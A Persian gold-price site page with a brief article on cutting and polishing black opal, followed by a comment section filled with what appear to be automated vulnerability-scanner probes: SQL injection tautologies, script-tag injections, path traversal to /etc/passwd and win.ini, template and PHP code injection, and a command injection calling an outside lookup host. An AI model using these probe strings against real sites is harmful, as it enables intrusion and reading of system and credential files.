سامانه پیامکی طلا،سکه،ارز،تلفن گویا صفحه حرفه ای قیمت ها !!! اوقات شرعی وساعات نماز

چند نکته درخصوص تراش اپال مشکی

اپال سیاه به صورت لبه های نورانی استخراج می شود و به همین نحو نیز تراش و پولیش می خورد. نکته مهم در رابطه با اپال سیاه این است که از کدام جهت برش بخورد. این یکی از ضروری ترین بخش های تراش این گوهر است اما غالب گوهرتراشان در این مورد اشتباه می کنند.

چند نکته درخصوص تراش اپال مشکی

پس از اینکه اپال تراش نخورده ای را خریداری نمودید، هرگز بدون بررسی اقدام به برش آن نکنید. ابتدا یک بخش کوچکی از آن را ببرید، در این صورت می توانید بفهمید که اپالتان را باید چگونه تراش دهید. یک گوشه ای از گوهرتان را پولیش دهید تا برایتان مشخص شود که کدام جهت از سنگ برای تراش بهتر است. با تراش برخی از قسمت های خاکستری رنگ، به قسمت های سیاه در اپال می رسیم؛ بنابراین ابتدا قسمت های خاکستری را صیقل دهید.

در برخی مواقع هنگامیکه از یک زاویه کریستال های اپال سیاه را تراش دهید، رنگ گوهر را بهتر بروز می دهند. اما این قاعده وجود دارد که هنگام تراش اپال سیاه، توسط گوهرتراش، اشتباهات زیادی صورت گیرد. البته اگر هنگام تراش ابتدا از نواحی کوچکتر شروع کرده تا درک بهتری درباره سنگ به دست بیاورید، درصد خطای شما کاهش خواهد یافت.

گونه های اپال بسیار بستگی به عمقی دارد که این گوهر استخراج می گردد. به عنوان مثال اپال هایی که از عمق 20 فوتی استخراج می گردند با اپال هایی که از عمق 40 فوتی به دست می آید بسیار متفاوت است.

یکی دیگر از مشکلاتی که غالبا گوهرتراشان تازه کار با آن دست به گریبانند، این است که چرخ های پولش آنها بسیار تیز و زبر می باشد بنابراین زمانیکه اقدام به پولیش و تراش گوهر می کنند میزان زیادی از رنگ اپال را از بین می برند. همین امر سبب می شود که ارزش اپال آنها به میزان بسیار زیادی نزول کند. اگر وسایل گوهرتراشی شما جدید و نو می باشد، همیشه بهتر است که از سنگ های تراش نخورده بزرگ برای این عمل شروع نمایید، تا با عملکرد لوازم و تجهیزات خود بیشتر آشنا گردید.

نظرات
ديدگاه هاي ارسال شده توسط شما، پس از تاييد توسط سايت طلا در وب سايت منتشر خواهد شد
0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:04
-1" OR 3*2>(0+5+568-568) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1" OR 3+568-568-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1" OR 2+568-568-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1 OR 3*2>(0+5+312-312)

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1 OR 3+312-312-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1 OR 2+312-312-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1 OR 3*2>(0+5+107-107) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1 OR 3+107-107-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
-1 OR 2+107-107-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
csaccDdL

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:03
1????%2527%2522

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1RQMVH[!+!]

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1dIitZ
Q2Dy(9080)

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1}body{acu:Expre/**/SSion(Q2Dy(9432))}

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
[url=][/url]

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
?

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1<ScRiPt>Q2Dy(9684)</sCripT>

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1u003CScRiPtQ2Dy(9838)u003C/sCripTu003E

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
%31%3C%53%63%52%69%50%74%20%3E%51%32%44%79%289295%29%3C%2F%73%43%72%69%70%54%3E

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1Q2Dy(9646)

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1Q2Dy(9331)

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:56
1Q2Dy(9682)

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
1Q2Dy(9359)

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
18CFSV[!+!]

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
1Q2Dy(9181)

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
{{10000405*9999702}}

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
CWS000x?=?1N?
]s??0Q?L

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
acux3053??z1??z2a?bcxuca3053

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
acu8352<s1﹥s2ʺs3ʹuca8352

0 0

wwdevkvs 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
19671519

0 0

jkfxcjle 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
/www.vulnweb.com

0 0

tfyqvifu 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
1????%2527%2522

0 0

qjdiditj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55

0 0

hhdvthfj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
${

0 0

hhdvthfj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
";print(md5(acunetix_wvs_security_test));$a="

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

hhdvthfj 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
;print(md5(acunetix_wvs_security_test));

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:55
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
................windowswin.ini

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
????????????????????????????????????????????????windows??win.ini

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
../../../../../../../../../../windows/win.ini.jpg

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
C:WINDOWSsystem32driversetchosts

0 0

thtxkxcb 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
testasp.vulnweb.com

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
../../../../../../../../../../windows/win.ini

0 0

thtxkxcb 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
WEB-INFweb.xml

0 0

thtxkxcb 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
/WEB-INF/web.xml

0 0

thtxkxcb 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
1some_inexistent_file_with_long_name.jpg

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
WEB-INF/web.xml

0 0

thtxkxcb 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
/../../../../../../../etc/passwd

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
..??..??..??..??..??..??..??..??etc/passwd

0 0

ukrhfhbi 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
${10000472+9999198}

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
%2fetc%2fpasswd

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
/etc/passwd

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
../../../../../../../../../../etc/passwd.jpg

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

uhohfdbf 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
to
bcc:013405.51-2913.51.a3dd0.1

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
../../../../../../../../../../../../../../../proc/version

0 0

uhohfdbf 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
1
bcc:013405.51-2911.51.a3dd0.1

0 0

pgehwcep 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
../../../../../../../../../../etc/passwd

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

qckgpeko 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
Oxcskm6F

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
0

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
-1" OR 2+769-769-1=0+0+0+1 --

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
-1 OR 2+128-128-1=0+0+0+1

0 0

wkdjueqp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
$(nslookup dns.ce.13405.51-2894.51.a3dd0.1.bxss.me)

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
-1 OR 2+425-425-1=0+0+0+1 --

0 0

wkdjueqp 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
set|set&set

0 0

mwuniwco 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
IGNwX4Ug

0 0

blbhjnap 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
1

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1IMWU3[!+!]

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1PzVmj
A49B(9806)

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1}body{acu:Expre/**/SSion(A49B(9901))}

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
[url=][/url]

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
?

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1<ScRiPt>A49B(9319)</sCripT>

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1u003CScRiPtA49B(9020)u003C/sCripTu003E

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
%31%3C%53%63%52%69%50%74%20%3E%41%34%39%42%289648%29%3C%2F%73%43%72%69%70%54%3E

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1A49B(9464)

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1A49B(9300)

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1A49B(9931)

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1A49B(9036)

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1CA1GK[!+!]

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
1A49B(9029)

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:44
{{9999310*9999245}}

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
CWS000x?=?1N?
]s??0Q?L

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
acux9567??z1??z2a?bcxuca9567

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
acu4852<s1﹥s2ʺs3ʹuca4852

0 0

axweivil 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
19755715

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

trvusqdn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
/www.vulnweb.com

0 0

xnapwnsd 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
1????%2527%2522

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
................windowswin.ini

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
????????????????????????????????????????????????windows??win.ini

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../../../../../../../../../../windows/win.ini.jpg

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
C:WINDOWSsystem32driversetchosts

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../../../../../../../../../../windows/win.ini

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
WEB-INFweb.xml

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
/WEB-INF/web.xml

0 0

bwkoujxl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
${

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
WEB-INF/web.xml

0 0

bwkoujxl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
";print(md5(acunetix_wvs_security_test));$a="

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
/../../../../../../../etc/passwd

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43

0 0

bwkoujxl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
;print(md5(acunetix_wvs_security_test));

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
..??..??..??..??..??..??..??..??etc/passwd

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

jwnlmkbj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
testasp.vulnweb.com

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
%2fetc%2fpasswd

0 0

jwnlmkbj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
/etc/passwd

0 0

jwnlmkbj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

jwnlmkbj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
1some_inexistent_file_with_long_name.jpg

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

jwnlmkbj 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43

0 0

tpahsmab 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
${9999487+10000004}

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../../../../../../../../../../etc/passwd.jpg

0 0

kfxbnbwd 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
to
bcc:013405.38-2786.38.5ebef.1

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

kfxbnbwd 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
1
bcc:013405.38-2784.38.5ebef.1

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../../../../../../../../../../../../../../../proc/version

0 0

kcdqcurs 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
../../../../../../../../../../etc/passwd

0 0

ciwxeadg 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
VQC0z8ju

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

rvobhspg 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
$(nslookup dns.ce.13405.38-2771.38.5ebef.1.bxss.me)

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

rvobhspg 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
set|set&set

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:43
0

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:42
-1" OR 2+600-600-1=0+0+0+1 --

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:42
-1 OR 2+764-764-1=0+0+0+1

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:42
-1 OR 2+162-162-1=0+0+0+1 --

0 0

usutadef 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:42
PycztOjO

0 0

ditlmtmk 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:42
1

اخبار سایر رسانه ها